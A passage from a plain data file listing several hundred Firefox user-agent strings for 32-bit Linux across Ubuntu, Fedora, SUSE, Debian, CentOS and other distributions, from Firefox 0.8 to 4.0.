rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-2.1 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.16) Gecko/20080715 Ubuntu/7.10 (gutsy) Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.2pre) Gecko/20061023 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.6) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.8) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 GTB5\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060309 Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.13) Gecko/2009080316 Ubuntu/8.04 (hardy) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19 GTB7.1\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB6\nMozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 GTB7.1\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; en-GB; rv:2.0) Gecko/20110404 Fedora/16-dev Firefox/4.0\nMozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.11) Gecko/20071216 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040225 Firefox/0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050715 Firefox/1.0.6 SUSE/1.0.6-16\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050719 Red Hat/1.0.6-1.4.1 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050720 Fedora/1.0.6-1.1.fc3 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050720 Fedora/1.0.6-1.1.fc4.k12ltsp.4.4.0 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050721 Firefox/1.0.6 (Ubuntu package 1.0.6)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050811 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050815 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050911 Firefox/1.0.6 (Debian package 1.0.6-5)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050918 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050920 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050921 Firefox/1.5.0.2 Mandriva/1.0.6-15mdk (2006.0)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20051106 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20051111 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20060410 Firefox/1.0.8 Mandriva/1.0.6-16.5.20060mdk (2006.0)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20060927 Firefox/1.0.4 (Debian package 1.0.4-2sarge12)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20061113 Firefox/1.0.4 (Debian package 1.0.4-2sarge13)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20070116 Firefox/1.0.4 (Debian package 1.0.4-2sarge15)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20070530 Firefox/1.0.4 (Debian package 1.0.4-2sarge17)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.4 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060413 Red Hat/1.0.8-1.4.1 Firefox/1.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041117 Firefox/1.0 (Debian package 1.0-2.0.0.45.linspire0.4)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041204 Firefox/1.0 (Debian package 1.0.x.2-1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041215 Firefox/1.0 Red Hat/1.0-12.EL4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041218 Firefox/1.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050210 Firefox/1.0 (Debian package 1.0+dfsg.1-6)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050221 Firefox/1.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050814 Firefox/1.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050310 Firefox/1.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050311 Firefox/1.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 SUSE/1.0.4-1.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050512 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Fedora/1.0.4-1.3.1 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050523 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050610 Firefox/1.0.4 (Debian package 1.0.4-3)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040630 Firefox/0.9.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040802 Firefox/0.9.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040917 Firefox/0.9.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20060911 SUSE/1.5.0.10-0.2 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070221 Red Hat/1.5.0.10-0.1.el4 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070223 CentOS/1.5.0.10-0.1.el4.centos Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070226 Fedora/1.5.0.10-1.fc6 Firefox/1.5.0.10 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070226 Red Hat/1.5.0.10-0.1.el4 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070302 Ubuntu/dapper-security Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070409 CentOS/1.5.0.10-2.el5.centos Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070529 Red Hat/1.5.0.12-0.1.el4 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070530 Fedora/1.5.0.12-1.fc6 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070719 CentOS/1.5.0.12-0.3.el4.centos Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20071126 Fedora/1.5.0.12-7.fc6 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.13pre) Gecko/20080207 Ubuntu/dapper-security Firefox/1.5.0.13pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060313 Debian/1.5.dfsg+1.5.0.1-4 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060324 Ubuntu/dapper Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060404 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060419 Fedora/1.5.0.2-1.2.fc5 Firefox/1.5.0.2 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko Firefox/1.5.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060504 Fedora/1.5.0.3-1.1.fc5 Firefox/1.5.0.3 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060406 Firefox/1.5.0.4 (Debian-1.5.dfsg+1.5.0.4-1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060527 SUSE/1.5.0.4-1.3 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060613 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060614 Fedora/1.5.0.4-1.2.fc5 Firefox/1.5.0.4 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060629 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060704 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060711 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060716 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060801 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060803 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060806 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060812 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060813 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060820 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060831 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (Debian-1.5.dfsg+1.5.0.6-1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (Debian-1.5.dfsg+1.5.0.6-4)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-0.1 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060802 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060803 Firefox/1.5.0.6 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060807 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060905 Fedora/1.5.0.6-10 Firefox/1.5.0.6 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060911 Red Hat/1.5.0.7-0.1.el4 Firefox/1.5.0.1 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20061014 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20060802 Mandriva/1.5.0.8-1.1mdv2007.0 (2007.0) Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20060911 SUSE/1.5.0.8-0.2 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061107 Fedora/1.5.0.8-1.fc6 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061110 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061115 Ubuntu/dapper-security Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20060911 SUSE/1.5.0.9-0.2 Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20060911 SUSE/1.5.0.9-3.2 Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061215 Red Hat/1.5.0.9-0.1.el4 Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061219 Fedora/1.5.0.9-1.fc6 Firefox/1.5.0.9 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061221 Fedora/1.5.0.9-1.fc5 Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20070102 Ubuntu/dapper-security Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20070126 Ubuntu/dapper-security Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20070316 CentOS/1.5.0.9-10.el5.centos Firefox/1.5.0.9 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.2 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10 (Debian-2.0.0.10-0etch1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071128 Fedora/2.0.0.10-2.fc7 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071203 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071217 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20080201 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.12 (Debian-2.0.0.12-0etch1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12 Mnenhy/0.7.5.666\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Firefox/2.0b2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20061201 Firefox/2.0.0.13 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080316 SUSE/2.0.0.13-0.1 Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080316 SUSE/2.0.0.13-1.1 Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080325 Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080330 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13 (Linux Mint)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20061201 Firefox/2.0.0.14 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080410 SUSE/2.0.0.14-0.4 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc8 Firefox/2.0.0.14 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080417 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080423 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080428 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080508 Ubuntu/8.04 (hardy) Firefox/2.0.0.14 (Linux Mint)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080525 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.15) Gecko/20061201 Firefox/2.0.0.15 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.15) Gecko/20080702 Ubuntu/8.04 (hardy) Firefox/2.0.0.15\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080715 Fedora/2.0.0.16-1.fc8 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080715 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080715 Ubuntu/7.10 (gutsy) Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 Firefox/3.07\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080722 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080703 Mandriva/2.0.0.17-1.1mdv2008.1 (2008.1) Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080827 Firefox/2.0.0.10 (Debian-2.0.0.17-0etch1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080921 SUSE/2.0.0.17-1.2 Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080924 Ubuntu/8.04 (hardy) Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20080921 SUSE/2.0.0.18-0.1 Firefox/2.0.0.18\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20081112 Fedora/2.0.0.18-1.fc8 Firefox/2.0.0.18\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20081113 Ubuntu/8.04 (hardy) Firefox/2.0.0.18\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081213 SUSE/2.0.0.19-0.1 Firefox/2.0.0.19\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081216 Fedora/2.0.0.19-1.fc8 Firefox/2.0.0.19 pango-text\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081230 Firefox/2.0.0.19\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0.1+dfsg-2)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061220 Firefox/2.0.0.1 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20070110 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; 